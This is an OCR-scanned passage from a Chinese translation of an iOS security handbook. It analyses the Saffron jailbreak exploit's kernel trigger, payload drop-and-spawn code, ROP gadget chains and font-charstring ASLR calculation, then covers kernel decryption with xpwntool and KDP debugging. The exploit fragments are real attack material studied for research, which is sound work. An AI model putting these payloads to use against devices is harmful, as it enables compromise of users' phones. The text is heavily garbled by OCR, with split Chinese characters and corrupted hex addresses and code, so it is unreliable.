IOConnectCallStructMethod(connect, 5, kpayload, 0xd8, 0, 0); 
IOServiceClose (connect); 

munlock(addr, 0x4a0); 

void *locutusptr = malloc (0x8590); 

zlib.uncompress (locutusptr, 0x8590, locutussource, 0x30eb); 
fd = open("/tmp/locutus", O_WRONLY | O_CREAT | O_TRUNC, 0755); 
write(fd, locutusptr, 0x8590); 


















































close (fd); 

posix_spawn(0, "/tmp/locutus", 0, 0, NULL, NULL); 
// 这 将 使 执行 继续 下 去 

r0 133373 


sp craftedqd offset; 

这 上段 代码 首先 会 把 ROP 内 核 空 间 shellcode ( kpayload ) 映射 到 一 个 特定 的 地 址 。 之 后 ， 它 
会 定位 AppleRGBOUT IOKit 服 务 ， 并 用 两 个 Toconnectcall 函 数 触 发 模块 中 的 漏洞 。 在 这 里 ， 
内 核 shellcode 会 被 执行 。 这 段 shellcode 也 是 ROP， 而 且 它 将 禁用 若干 种 保护 机 制 ， 其 中 就 包括 代 
码 签名 ， 这 样 一 来 ,在 之 后 执行 返回 用 户 空间 时 locutus 应 用 程序 就 可 以 运行 了 。 事 实 上， 然后 它 
会 取消 对 这 些 shellcode 的 映射 ， 解 压缩 locutus 二 进 制 文件 ， 将 其 写 入 某 个 文件 ， 并 派生 该 文件 。 

最 后 ， 为 了 避免 MobileSafari 崩 演 ， 我 们 要 把 栈 指针 置 于 安全 位 置 ， 并 把 RO 置 为 表示 受 影响 
函数 返回 值 的 某 个 值 ， 从 而 恢复 执行 。 

鉴于 整个 RAOP 有 效 载荷 的 大 小 和 复杂 度 , 分 析 它 可 能 要 花 上 一 整 革 的 篇 幅 ， 因 此 我 们 在 这 里 
只 专注 于 其 中 某 些 特定 的 指令 片段 和 反复 涉及 的 模式 。 

首先 ， 整 个 有 效 载荷 是 用 Python 代码 编写 的 ， 其 中 包装 了 必要 的 指令 片段 。 因 此 ， 得 到 的 
shellcode 中 会 有 特别 多 的 重复 指令 。 训 无 疑问 ， 最 常用 也 是 我 们 最 感 兴趣 的 就 是 用 来 执行 函数 调 
用 的 指令 片段 。 下 面 的 指令 片段 是 与 这 个 在 有 效 载荷 中 常用 于 调试 的 C 语 言 函 数 调用 对 应 的 : 

char *str; 


fprintf(stderr, "Result for %s was %08x\n", str); 
// 首 先 要 pop{r4,，r7,，pc} 
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0x1le79c //r4,， 这 是 将 要 利用 infoleak 调 整 的 地 址 


0x0 /AE 
0x3002b379 //pc， 这 完成 的 是 : ldr r0， [r0，, #0] pop{r7, pc} 
0x0 /YE 


0x32882613 //pc， 这 完成 的 是 : str r0,，[r4, #0] pop{r4, pc} 

Oxle4c4 //r4,， 这 是 将 要 利用 infoleak 调 整 的 地 址 

0x32882613 //pc， 这 完成 的 是 : str r0,，[r4, #0] pop{r4, pc} 
0x32c928fq //r4，fprintf 的 地 址 

0x30fb7538 //pc， 这 完成 的 是 : pop {r0, rl, r2, r3, pc} 

0x3e810084 //r0，_  _stderrp 的 地 址 

0xleec8 //r1,， 利用 infoleak 调 整 的 地 址 

0xleee0 //r2,， 利 用 infoleak 调 整 的 地 址 

0x0 //r3 

0x3002b379 //pc， 这 完成 的 是 : ldr r0，[r0, #0] pop{r7, pc} 

0xle4d8 //r7， 利 用 infoleak 调 整 

0x3001a889 //pc， 这 完成 的 是 : blx r4 sub sp, r7, #4 pop{r4, r7, pc} 
0x332a6129 //r4, mach_task_self 的 地 址 

Oxle4e4 //r7， 利 用 infoleak 调 整 

0x3001a889 ////pc， 这 完成 的 是 : blx r4 sub sp, r7, #4 pop{r4, r7, pc} 


在 大 多 数 情况 下 , 余下 的 代码 并 不 是 太 复杂 , 而 且 它 大 大 地 利用 了 之 前 演示 过 的 模式 执行 函 
数 调用 。shellcode 中 男 两 个 相关 部 分 就 是 开关 和 结尾 ， 它 们 分 别 用 于 ASLR 增 量 的 计算 与 执行 的 
恢复 。 

负责 写 和 有效 载 荷 的 T1 例 程 一 开始 会 执行 以 下 指令 : 











0x00000000 8c push 0XxX1 

Ox00000001 8c push 0x1 

0x00000002 a4 push 0x19 

0x00000003 Oe 10 callothersubr #25 nargs=1; 
get_buildchar top[0] = decoder->buildchar[idx]; 


该 指令 序列 会 先后 压 人 要 传递 给 函数 的 参数 、 参 数 的 个 数 ( 0x1 ) 以 及 例 程 编号 ( 0x19 )。 
该 函数 会 把 由 漏洞 攻击 程序 泄露 的 C 语 言 函 数 T1_Parse_Glyph 的 地 址 压 和 人 栈 中 。 之 后 ， 如 下 代 
码 会 执行 : 


Ox00000005 ff 33 73 f6 41 push 0x3373f641 











0x0000000c 8qd push 0x2 

0x0000000d a0 push 0x15 

0x0000000e 0c 10 callothersubr #21 nargs=2; 
substract top[0] -= top[1]; top++ 


例 程 21 会 接受 被 压 和 人 栈 中 的 两 个 值 (内存 中 的 T1_Parse_Glyph 函 数 的 地 址 , 以 及 库 中 相同 
函数 的 原始 地 址 )， 并 压 入 这 两 者 的 差 ， 接 着 利用 如 下 代码 把 这 个 差 存储 到 攻击 者 控制 的 位 置 : 

















0x00000010 8c push 0x1 

0x00000011 8d push 0x2 

0x00000012 a3 push 0x18 

0x00000013 0c 10 callothersubr #24 nargs=2; 
set_ buildchar decoder->buildchar[idx] = top[0]; 





该 位 置 现 在 含有 ASLR 增 量 , 例 程 4、 例 程 $ 和 例 程 7 会 利用 它 正确 地 重新 定位 有 效 载荷 其 余 的 
部 分 。 下 一 步 是 计算 递增 栈 指 针 的 指令 片段 的 地 址 ， 由 以 下 代码 完成 : 
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0x00000015 8b push 0x0 

Ox00000016 ff 32 87 9f 4b push 0x32879f4b 
0x0000001d 8c push 0x1 

Ox0000001le 8c push Oxl 

Ox0000001f a4 push 0x19 

0x00000020 0c 10 callothersubr #25 nargs=1; 
get_buildchar top[0] = decoder->buildchar[idx]; 
0x00000022 8d push 0x2 

0x00000023 9f push 0x14 

Ox00000024 0c 10 callothersubr #20 nargs=2; 
adqd top[0] += top[1]; top++ 

0x00000026 0c 21 op_setcurrentpoint ; top -= 2; x=top[0]; 


y=top[1]; decoder->flex_ state=0 
存储 在 内 存 中 的 指令 片段 是 已 执行 的 第 一 个 指令 片段 ， 它 进行 了 以 下 操作 : 


add sp, #320 
pop. {r4, L595; De} 


下 一 段 代码 会 把 之 前 的 指令 片段 正常 工作 所 必需 的 3 个 双 字 压 人 栈 中 





0x00000028 8b push 0x0 
0x00000029 8f push Ox4 
0x0000002a 0a callsubr #04 ; Subr_put_dword 
0x0000002b 8b push 0x0 
0x0000002c 8f push Ox4 
0x0000002Qq 0a callsubr #04 ; subr_put_dword 


Ox0000002e fft 30 00 5c bd push 0x30005cbd 

0x00000033 ff 00 05 00 0 push 0x5 

0x00000038 0a callsubr #05 
subr_put_ dword adjust_lib 


上 述 代 码 可 有 效 地 将 如 下 双 字 压 入 栈 中 : 


0x0 
0x0 
0x30005cbq + ASLR offset 


从 这 里 起 , 栈 指针 又 一 次 被 调整 ， 而 ROP 有 效 载荷 其 余部 分 会 执行 。 该 有 效 载荷 的 最 后 部 分 
会 将 寄存 器 R0 置 为 1337， 并 把 栈 指 针 置 于 让 攻击 者 可 以 继续 执行 的 位 置 : 








Ox00000aff ff 10 00 05 39 push 0x10000539 
Ox00000b04 ff 10 00 00 00 push 0x10000000 
0x00000b09 ff 00 02 00 00 push 0x2 

0x00000boe ff 00 15 00 00 push 0x15 

Ox00000b13 0c 10 callothersubr #21 nargs=2; 
subtract top[0] -= top[1]; top++ 


因为 某 些 值 没 法 压 人 应 用 程序 的 栈 中 , 所 以 这 里 要 用 到 一 点 小 手段 。 这 个 小 手段 就 是 把 两 个 
合法 的 值 相 减 ， 只 在 栈 中 留 下 必要 的 一 个 值 。 在 上 面 的 代码 中 ，0x10000539 和 0x10000000 被 
作为 参数 传递 给 函数 21 。 相 减 的 结果 1337 会 被 压 人 栈 中 。 然 后 该 有 效 载荷 会 利用 位 于 
0x30005e97 的 指令 片段 把 1337 存 储 到 Ro 中 : 


0x00000p17 8b push 0x0 
0x00000b18 8f push Ox4 
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0x00000b19 0a callsubr #04 ; Subr_put_dword 
Ox00000bla ff 30 00 5e 97 push 0x30005e97 
Ox00000b1f ff 00 05 00 00 push 0x5 
0x00000p24 0a callsubr #05 ; Subr_ put dword adjust_lib 
至 此 ， 这 个 有 效 载 和 茶 就 只 差 把 栈 指 针 置 于 不 会 让 浏览 器 骨 湿 的 安全 位 置 了 : 
0x00000b25 8b push 0x0 
0x00000b26 8f push 0x4 
0x00000b27 0a callsubr #04 ; Subr_put_dword 
Ox00000b28 ff 10 00 01 b0 push 0x100001b0 
0x00000b2q ff 10 00 00 00 push 0x10000000 
0x00000b32 ff 00 02 00 00 push 0x2 
0x00000b37 ff 00 15 00 00 push 0x15 
0x00000b3c 0c 10 callothersubr #21 nargs=2 
subtract top[0] -= top[1]; 七 OP++ 
0x00000b3e 91 push 0x6 
Ox00000b3f 0a callsubr #06 6 
0x00000b40 ff 30 00 5d b5 push 0x30005db5 
Ox00000b45 ff 00 05 00 00 push 0x50000 





上 述 代 码 利用 了 惯用 的 相 减 手段 把 0x1b0 压 入 栈 中 。 


移 量 ) 相 加 。0x30005db5 处 的 指令 











个 栈 位 置 弹出 若干 个 寄存 器 ， 并 恢复 MobileSafari 的 执行 。 
很 显然 ，Saffron 是 个 非常 精妙 复杂 的 漏洞 攻击 程序 。 我 们 希望 大 家 已 经 多 少 了 解 到 Saffron 

中 的 ROP 有 效 载荷 是 如 何 工 作 的 。 在 本 书 的 配套 网 站 上 有 两 个 脚本 一 一 saffron-dump .py 和 

Saffron-ROP-dump.py， 它 们 可 以 协助 大 家 转 储 和 分 析 其 余 的 shellcode 代 码 。 


8.5 小结 


在 本 章 中 大 家 见识 








始 ， 我 们 一 直 讲 到 了 ROP 的 自动 化 。 
我 们 介绍 了 一 种 测试 ROP 有 效 载 答 的 简单 方式 ， 并 概述 了 攻击 者 利用 该 技术 可 以 在 iOS 上 的 





行 的 操作 。 
最 后 ， 








我 们 展示 了 现实 中 两 个 复杂 的 ROP 有 效 载荷 。 第 一 


个 则 使 用 ROP 有 效 载荷 对 本 机 的 内 核 漏洞 进行 漏洞 攻击 。 
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个 值 随后 会 与 例 程 6 得 到 的 值 ( 栈 偏 


po 文 个 值 再 减 去 0x18 的 位 置 ， 从 这 


了 利用 ROP 绕 过 DEP 和 代码 签名 机 制 的 手法 ,从 最 初 的 return-to-libc 技 术 开 





个 是 从 电话 中 窃取 数据 的 ， 而 第 二 
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到 目前 为 止 ， 本 书 中 介绍 的 所 有 例子 和 漏洞 攻击 有 效 载荷 都 着 眼 于 iOS 的 用 户 空间 。 不 过 ， 
用 户 空间 代码 能 做 的 事情 非常 有 限 ， 因 为 内 核实 施 的 安全 措施 为 其 带 来 了 诸多 限制 。 因 此 ,这 种 
攻占 是 不 彻底 的 ， 除 非 大 家 开始 更 加 深入 地 了 解 如 何 攻击 内 核 并 渗透 最 后 一 道 防线 。 本 童 ， 大 家 
将 全 面 了 解 各 种 知识 , 学 会 查找 内 核 中 的 安全 漏洞 ,以 调试 发 现 的 问题 并 将 漏洞 转化 为 能 起 作用 
的 内 核 漏洞 攻击 程序 。 


9.1 内 核 的 结构 


在 查看 iOS 内 核 ， 了 解 它 的 结构 或 对 其 进行 逆向 工程 之 前 ， 我 们 必须 获得 一 份 二 进 制 形 式 的 
iOS 内 核 副本 。 需 要 的 二 进 制 文件 名 为 kernelcache.release.*,， 大 家 可 以 在 iOS 固 件 的 PSW 归 档 文 件 
中 找到 它 。 不 过 ， 内 核 二 进 制 文件 是 IMG3 格 式 的 ， 这 意味 着 它 是 打包 且 加 密 过 的 。 解 密 该 文件 
需要 解密 密 钥 和 名 为 xzpwntool 的 工具 ,该 工具 在 Github 上 有 不 同人 开发 的 多 个 版 本 。 大 家 可 以 
在 http:/github.com/planetbeing/xpwn 找 到 原始 版 本 的 xpwntool。 

用 于 解密 IMG3 文 件 的 解密 密 钥 和 AES 初 始 化 向 量 是 存储 在 文件 之 中 的 。 它 们 并 非 以 明文 的 
形式 存储 ， 而 是 用 设备 的 GID 密 钥 加 密 过 。GID 密 钥 是 固化 到 设备 的 硬件 中 且 无 法 提取 的 。 使 用 
相同 型 号 处 理 器 的 设备 是 共用 GID 密 钥 的 ， 这 表示 iPhone 4、iPod4G 和 iPad1 共 用 相同 的 密 钥 ， 而 
像 iPhone 3G(S)、iPad 2 和 iPhone 4S 之 类 的 其 他 设备 则 使 用 了 不 同 的 密 钥 。 因 此 ， 要 得 到 特定 内 核 
真正 的 解密 密 钥 ， 唯 一 可 行 的 办 法 就 是 在 使 用 相同 型 号 处 理 器 的 设备 上 运行 代码 。 此 外 ，GID 密 
钥 在 内 核 启 动 前 的 设备 引导 过 程 中 是 禁用 的 ， 因 此 在 确定 解密 密 钥 时 要 用 到 bootrom 、iBoot 或 
ramdisk 级 的 漏洞 攻击 程序 。 这 也 就 意味 着 在 编写 本 书 时 ， 我 们 暂时 没有 办 法 取得 iPad 2 和 iPhone 
48 的 解密 密 钥 ,因为 尚 无 公开 的 针对 这 些 设备 的 底层 漏洞 攻击 程序 。 对 于 其 他 各 种 设备 来 说 则 没 
问题 , 实际 的 密 钥 可 以 在 THEiPHONEWiKi( http://theiphonewiki.com/ ) 这 样 的 网 站 上 或 是 redsn0w 
的 keys.plist 文 件 中 找到 。 



























































注意 读者 可 在 本 书 配 套 网 站 www.wiley.com/go/ioshackershandbook 下 载 本 章 中 的 代码 。 


知道 了 密 钥 之 后 用 xpwntool 解 密 就 很 简单 了 ， 而 且 一 旦 解密 就 可 以 揭示 内 核 的 秘密 了 。 下 
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面 的 例子 展示 了 如 何 使 用 xpwntool 解 密 内 核 : 


$ xpwntool kernelcache.iPod4,1 4.3.5_8L1.packed 
kernelcache.iPod4,1 4.3.5_ 8L1 .decrypted -iv 48c4bac83f853a2308d1525a4a83ac37 -k 
4025a88dcb382c794a295ff9cfa32f26602c76497afc01f2c6843c510c9efcfc 


解密 后 我 们 会 发 现 内 核 二 进 制 文件 其 实 是 个 ARM Mach-O 可 执行 文件 。 除 了 基本 内 核 (base 
kernel )， 它 还 含有 若干 个 存储 着 已 加 载 内 核 扩 展 的 存储 段 。 进 一 步 分 析 二 进 制 文件 中 的 字符 串 
我 们 还 会 发 现 iOS 内 核 其 实 是 从 XNU 内 核 源 代码 一 个 未 公开 的 分 支 编译 而 来 的 。 因 此 ，iOS 内 核 
的 结构 与 Mac OS X 内 核 的 结构 相同 。 这 意味 着 ， 只 要 想 对 基本 内 核 进行 分 析 ， 公 开 版 的 XNU 内 
核 总 能 帮 上 忙 ， 除 非 没 拿 到 与 ARM 架 构 相 关 的 源 代码 。 除 此 之 外 ， 大 家 对 Mac OS X 的 大 多 数 认 
识 也 直接 适用 于 iOS， 只 有 少数 例外 。 因 此 ， 大 家 在 iOS 的 内 核 中 也 能 发 现 XNU 的 三 大 主要 组 成 
部 分 ， 它 们 分 别 是 psd、mach 和 IOKit。 


9.2 内核 的 调试 


在 对 内 核 朋 演进 行 分 析 , 或 是 开发 重要 的 内 核 漏洞 攻击 程序 时 , 我 们 有 必要 在 内 核 严 重 错误 
发 生 之 前 对 内 核 中 正在 发 生 的 变化 建立 反馈 机 制 。 尽管 对 iOS 内 核 的 二 进 制 分 析 已 经 证 明 Mac OS 
X 所 具有 的 大 部 分 调试 功能 也 被 编译 到 iOS 中 , 想 利 用 它们 却 并 不 容易 。 本 节 就 要 详细 介绍 iOS 中 
可 供 选择 的 各 种 调试 方法 。 

第 一 种 是 阅读 内 核发 生 严 重 错误 导致 OS 重启 后 由 DumpPanic 生 成 的 严重 错误 日 志 
( paniclog )， 从 而 推理 出 内 部 的 内 核 状 态 。 这 些 严 重 错误 日 志文 件 都 是 些 简单 的 文本 文件 ， 根 据 
所 发 生 内 核 严 重 错误 的 类 型 的 不 同 , 它们 看 起 来 是 有 区 别 的 。 有 关 这 次 严重 错误 的 一 般 信息 中 包 
含 了 CPU 的 当前 状态 , 而 且 如 果 可 能 的 话 ,， 还 有 一 小 段 内 核 追踪 信息 。 系 统 会 把 全 部 内 核 严 重 错 
误 日 志文 件 收集 到 /Library/Logs/CrashReporter/Panics 目 录 中 ， 在 越狱 过 的 设备 上 该 目录 可 以 直接 
访问 。 对 于 未 越狱 的 设备 来 说 ， 我 们 可 以 通过 MobileDevices 框 架 启动 lockdown 守 护 进 程 的 
com.apple.crashreportmover 服 务 ， 把 严重 错误 和 崩 演 的 日 志文 件 移 动 到 /var/mobile/Library/Logs/ 
CrashReporter 目 录 中 。 要 从 这 个 位 置 取 回 这 些 日 志文 件 ,大 家 只 需要 利用 com.apple.crashreportcopy- 
mobile AFC 服 务 。 每 当 iTunes 连 接 到 带 有 严重 错误 日 志文 件 的 设备 ， 这 些 服务 就 会 把 这 些 文件 复 
制 到 Mac 机 上 的 ~/Library/Logs/CrashReporter/MobileDevice/<devicename>/Panics 目 录 , 而 我 们 很 容 
易 从 这 个 目录 提取 这 些 文件 。 


Incident Identifier: 26FE1B21-A606-47A7-A382-4E268B94F19C 
CrashReporter Key: 28cc8dca9c256b584f6cdf8fae0d263a3160f77d 































































































Hardware Model: iPod4,1 
Date/Time: 2011-10-20 09:56:46.373 +0900 
OS Version: iPhone OS 4.3.5 (8L1) 


panic(cpu 0 caller 0x80070098): sleh abort: prefetch abort in kernel 
mode: 

fault_addr=0x41414140 

r0: Ox0000000e rl1l: Oxcd2dc000 r2: 0x00000118 r3: 0x41414141 

r4: 0x41414141 r5: Ox41414141 r6: 0x41414141 r7: Ox41414141 
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上 8: Ox41414141 r9: Oxc0b4c580 r10: 0x41414141 11: 0x837cc244 
12: 0xc0b4c580 sp: Oxcd2dbf84 lr: 0x8017484f pc: 0x41414140 
cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140 


Debugger message: panic 

OS version: 8L1 

Kernel version: Darwin Kernel Version 11.0.0: 
Sat Jul 9 00:59:43 PDT 2011; 
root:xnu-1735.47~1/RELEASE ARM S5L8930X 
iBoot version: iBoot-1072.61 

secure boot?: NO 

Paniclog version: 1 

Epoch Time: sec usec 

















Boot : Ox4e9f70d3 0x00000000 
Sleep : Ox00000000 0x00000000 
Wake : Ox00000000 0x00000000 


Calendar : 0x4e9f713Qq 0x000319ff 
Task 0x80f07c60: 6227 pages, 79 threads: pid 0: kernel task 
Task 0x80f07a50: 185 pages, 3 threads: pid 1: launchd 

上 面 这 上段 严重 错误 日 志 示 例 描述 了 在 引导 某 个 特殊 内 核 时 发 生 的 内 核 严 重 错误 ,发生 这 个 严 
重 错误 的 原因 在 于 CPU 试 图 从 地 址 09x41414140 预 取 接 下 来 的 指令 。 这 表示 基于 栈 的 缓冲 区 溢出 
会 用 大 量 的 字符 A 重 写 已 存储 的 寄存 器 值 和 已 存储 的 返回 地 址 。 不 过 ， 这 份 严 重 错误 日 志 中 最 重 
要 的 信息 是 LR 寄存 器 的 值 ， 因 为 该 寄存 器 含有 洲 出 函数 调用 之 后 指令 的 地 址 。 不 过 , 这 种 调试 方 
法 的 局 限 性 很 强 , 没 法 让 大 家 从 调用 代码 的 地 方 进行 追踪 并 确定 或 找到 引发 问题 的 输入 。 尽管 如 
此 ， 在 iOS 4.3 之 前 ， 人 们 针对 所 有 用 于 iOS 设 备 越狱 的 公开 漏洞 开发 内 核 漏洞 攻击 程序 时 ， 这 种 
方法 是 主要 的 调试 方法 。 只 有 在 iOS 4.3 发 布 之 后 ， 内 核 黑客 们 才 成 功利 用 iOS 内 核 中 包含 的 另 一 
种 更 强大 的 调试 功能 。 

根据 对 iOS 的 kernelcache 文 件 进行 的 二 进 制 分 析 ， 人 们 得 知 Mac OS X 内 核 中 使 用 的 内 核 调 试 
协议 KDP 也 被 编译 到 了 iOS 内 核 中 。 激 活该 协议 就 要 求 使 用 depug3 引 导 参 数 ， 或 引导 打 过 补丁 的 
内 核 。 自 从 George Hotz 开 发 的 Limeraln bootrom 漏 洞 攻 击 程序 发 布 后 ，iPhone 4 之 类 当时 较 新 的 
设备 就 可 以 这 样 调试 内 核 了 。 不 过 因为 公开 的 越狱 中 内 核 补丁 已 损坏 , 所 以 人 们 一 开始 对 这 种 方 
法 的 尝试 失败 了 ， 而 且 KDP 会 被 视 为 已 损坏 或 是 已 被 苹果 公司 面向 OS 禁用 了 的 。 但 是 ， 在 经 过 
一 段 时 间 后 ， 人 们 发现 KDP 其 实 是 部 分 运转 的 ,而且 在 引导 瞬间 内 核 朋 省 后 只 剩 部 分 功能 了 。 这 
些 信息 让 我 们 有 可 能 从 公开 的 内 核 补丁 中 追查 引发 问题 的 原因 。 如 今 KDP 已 经 完全 可 以 使 用 了 。 

一 开始 , 利用 KDP 进 行 iOS 内 核 调试 是 只 有 iOS 越 狱 开发 团队 的 成 员 才 能 使 用 的 方式 , 因为 只 
有 他 们 才能 引导 任意 内 核 或 在 引导 最 新 版 本 的 OS 时 使 用 引导 参数 ,这 种 局 面 在 Chronic Dev Team 
发 布 开 源 越狱 工具 syringe 时 首次 发 生 了 改变 。 有 了 这 些 代 码 , 每 个 人 最 后 都 有 可 能 引导 不 同 的 
内 核 或 提供 任意 引导 参数 了 。 与 此 同时 ，iPhone Dev Team 将 这 一 功能 添加 到 了 他 们 的 redsn0w 
工具 ， 让 普通 的 最 终 用 户 也 能 接触 到 该 功能 。 现 在 ， 要 在 激活 KDP 的 情况 下 引导 内 核 只 需 设置 
debug 引 导 参 数 的 -a 选项 。 


$ ./redsnow -j -a "debug=0x9" 
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qebug 引 导 参 数 其 实 是 位 字段 , 让 大 家 可 以 选中 或 去 除 特定 的 KDP 功 能 。 表 9-1 列 出 了 通过 切 
换 适当 的 位 所 能 使 用 的 不 同调 试 功能 。 支 持 的 位 就 和 Mac OS X 内 核 调试 中 可 用 的 那些 位 相同 ， 
而 且 可 以 从 苹果 公司 提供 的 内 核 调试 文档 中 找到 。 不 过 , 某 些 调试 功能 可 能 不 会 达到 预期 效果 或 
者 根本 不 可 用 。 在 出 现 严 重 错误 或 不 可 屏蔽 中 断 (NMI ) 时 创建 内 核 转 储 的 选项 就 不 起 作用 ， 
为 iPhone 中 没有 以 太 网 设备 。 根 据 苹果 公司 开发 人 员 在 报告 中 的 说 法 ， 像 间 入 处 于 NMI 状 态 的 调 
试 器 这 样 的 选项 是 可 以 起 效 的 , 不 过 当 大 家 尝试 这 些 选项 时 , 它们 可 能 只 是 引发 严重 错误 并 使 设 
备 重启 。 这 可 能 是 由 男 一 个 受 损 的 内 核 补丁 导致 的 。 在 新 近 面 世 的 苹果 设备 上 ， 只 要 同时 按 住 电 
源 键 和 音量 减 小 键 儿 秒 钟 ， 我 们 就 可 以 触发 NMI。 


表 9-1 可 通过 debug 引 导 参 数 选 择 的 调试 选项 




































































名 称 值 描 述 
DB_HALT 0x01 暂停 引导 ， 等 待 附加 调试 器 
DB_PRT 0x02 这 会 导致 内 核 printf () 语 句 被 发 送 给 控制 台 
DB_NMI 0x04 这 应 该 暂停 NMI 
DB_KPRT 0x08 这 会 导致 内 核 printf () 语 句 被 发 送 给 控制 台 
DB_SLOG 0x20 这 会 把 诊断 信息 输出 到 系统 日 志 
DB_ARP 0x40 这 让 调试 器 在 跨 路 由 器 调试 时 可 以 ARP 和 路 由 
DB_LOG_PI_SCRN 0x100 这 会 禁用 图 形 化 的 严重 错误 对 话 框 
































大 家 需要 解决 一 些 问 题 方 能 在 iPhone 这 样 的 设备 上 使 用 KDP。KDP 是 一 种 可 以 在 以 太 网 或 者 
串 行 接口 上 使 用 的 UDP 协议 ， 而 iPhone 上 没有 这 两 种 端口 。 不 过 ，iPhone 的 基 座 连接 需 的 引 脚 表 
明 至 少 可 以 通过 第 12 号 和 第 13 号 针脚 访问 串 行 端口 。 它 们 可 以 用 来 构建 iPhone 基 座 连接 需 到 串口 
适配器 。 大 家 可 以 在 本 书 配套 网 站 ( www.wiley.com/go/ioshackershandbook ) 上 找到 完整 解释 了 
基 座 连接 右 引 脚 、 所 需 部 件 和 构建 过 程 的 指南 。 

一 旦 拥有 了 把 iPhone 连接 到 串 行 端口 的 基 座 连接 器 到 串口 适配器 ， 你 就 会 遇 到 另 一 个 问题 ， 
它 与 GNU 调 试 器 (GDB ) 及 其 对 KDP 的 支持 有 关 。 默 认 情况 下 ，GDB 不 支持 通过 串口 的 KDP， 
为 即便 使 用 的 是 串口 , KDP 仍 然 会 把 每 条 消息 都 封装 在 伪造 的 以 太 网 和 UDP 数据 包 中 。 因 为 该 
问题 不 止 会 影响 iOS, 还 会 影响 Mac OS X 的 内 核 调 试 , 所 以 人 们 已 经 给 出 了 解决 方法 。 在 2009 年 ， 
David Elliott 开 发 了 一 个 名 为 SerialKDPProxy 的 工具 , 它 可 以 充当 串口 上 UDP 到 KDP 的 代理 。 大 家 
应 该 使 用 由 原始 工具 派生 的 新 版 本 ( https://github.com/stefanesser/serialKDPproxy )， 因 为 原始 工 
具 不 能 在 Mac OS X Lion 上 正常 工作 。 使 用 该 工具 的 情况 如 下 所 示 : 


$ ./SerialKDPProxy /dev/tty.<serial device name> 

Opening /dev/tty.<serial device name> 

Waiting for packets, pid=577 

AppleH3CamIn: CPU time-base registers mapped at DART translated address: 
0x0104502fmi_ iop_set_config:192 cmd->reasetup_cyclesAppleH3CamIn: 
:Se4Driver: 

pdleOpennit: driver advertises bootloader pages 
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AppleNANDLegacyFTL::_FILInit: driver advertises WhiteningData 
eD1815PMU: :start: DOWNO: 1050mV 

tart: set VBUCK1_PRE1 to 950 

AppleD1815PMU: :start:A2 x 4 = 8,IIAPP1eNANDFTL:: publishServices: 
Creating block device of 3939606 sectors of 8192 bytes 
APPleNANDFTL::_publishServices: block device created, ready for work 
ApPPleNANDFTL: :setPowerStamappings 


有 了 这 些 设 置 ， 大 家 最 终 可 以 用 GDB 连 接 到 等 待 调试 器 的 OS 内 核 了 。 为 达到 最 佳 效 果 ， 大 
家 应 该 使 用 iOS SDK 中 提供 的 GDB 二 进 制 文件 ， 因 为 它 已 经 包含 了 所 有 必要 的 对 ARM 的 支持 。 
要 让 GDB 通 过 SerialKDPProxy 发 声 , 我 们 就 要 针对 远程 的 KDP 目 标 对 其 进行 配置 ,并 告诉 它 附加 
到 本 地 主机 上 : 


$ /Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch 
armv7 GNU gdb 6.3.50-20050815 (Apple version gdb-1705) 

(Fri Jul 1 10:53:44 UTC 2011) 

This GDB was configured as 

"--host=x86_64-apple-darwin --target=arm-apple-darwin"... 

(gdb) target remote-kdp 

(gdb) attach 127.0.0.1 

Connected. 


如 果 此 时 你 试图 使 用 调试 器 ,会 发 现 可 用 性 很 有 限 , 因为 GDB 对 要 调试 的 实际 目标 毫 无 了 解 。 
追踪 功能 也 不 能 发 挥 预期 的 效果 , 并 且 只 显示 了 一 条 未 知 数据 项 。 此 外 ，examine 命 令 会 错误 地 
以 ARM 模 式 〈 而 不 是 Thumb 模 式 ) 对 代码 进行 反 汇 编 : 

(gdb) bt 

#0 Ox8006e110 in ?? () 


(gdb) x/5i S$pc 
0x8006e110 : undefined 


























0x8006e114: rscle r2, sp, r0, lsl] #24 
0x8006e118 : rscsle rr2, r9, r0, lsl #28 
Ox8006ellc: ldrtmi r4, [r1], -r0, asr #12 





0x8006e120: mrrc2 Tr -15 Be 4, CELS 
要 得 到 正确 的 反 汇 编 文 件 ， 大 家 必须 强制 GDB 将 cPSR 寄 存 器 的 T 位 考虑 进来 : 


(gdb) x/6i S$pc | $cpsr.t 





0x8006e111: undefined 
0x8006e113 : 下 0x8006e114 
0x8006e115 : cmp r4, #0 
0x8006e117 : beq.n Ox8006e0f4 
0x8006e119 : cmp r6, #0 
0x8006ellb: beq.n 0x8006e110 


而 解决 追踪 函数 损坏 的 问题 就 不 这 人 么 简单 了 。 要 得 到 正常 的 追踪 函数 ， 我 们 就 需要 向 GDB 
提供 符号 化 的 内 核 二 进 制 文件 。 使 用 解密 且 未 压缩 的 内 核 缓存 二 进 制 文件 可 以 改善 这 一 情况 , 不 
过 这 只 能 提供 少量 的 内 核 符号 。 我 们 无 法 获得 完整 的 内 核 符号 集 ， 因 为 苹果 公司 并 不 希望 有 人 来 
调试 iOS 内 核 。 因 此 ， 它 没有 向 公众 提供 iOS 内 核 调试 套件 。 不 过 ， 为 Mac OS X 提 供 的 内 核 调试 
套件 对 于 iOS 的 内 核 调试 来 说 仍然 有 用 ， 因 为 这 允许 大 家 使 用 zynamics BinDiff 这 样 的 工具 ， 而 该 
工具 甚至 可 以 跨 CPU 架 构 移植 符号 。 除 此 之 外 ，igaiostoolkit 提 供 更 大 的 一 组 已 经 为 某 些 iOS 
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内 核 移植 的 内 核 符号 。 


These kernel Symbols can be used as followss 
/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch armv7 
kernelcache.symbolized 

gdb) target remote-kdp 

gdb) attach 127.0.0.1 

Connected. 

gdb) bt 

0 Ox8006e110 in sub_8006E03C () 

0x8006el9e in Debugger () 

0x8007402a in sub 80074020 () 

0x8000a9a0 in kdqp_set_ip_andq mac addresses () 
0x8000ac88 in sub 8000RAC14 () 

0x80020cf6 in sub 80020C98 () 

6 Ox8006c31c in sub_ 8006C300 () 


现在 大 家 可 以 随处 设置 断 点 了 。 这 里 在 地 址 0x8017484A 处 设置 了 断 点 ， 该 位 置 是 进行 








ORODP 














copyin () 调用 的 地 方 ， 而 这 正 是 在 严重 错误 日 志 中 说 明 的 引发 栈 缓冲 区 溢出 的 函数 调用 。 这 个 
断 点 是 位 于 setgroups () 系统 调用 中 的 : 


(gdb) break *0x8017484a 
Breakpoint 2 at 0x8017484a 
(gdb) c 

Continuing. 


大 家 可 以 继续 执行 ， 直 到 代码 触发 该 断 点 。 因 为 在 引导 过 程 中 要 多 次 触发 setgroups () 。 























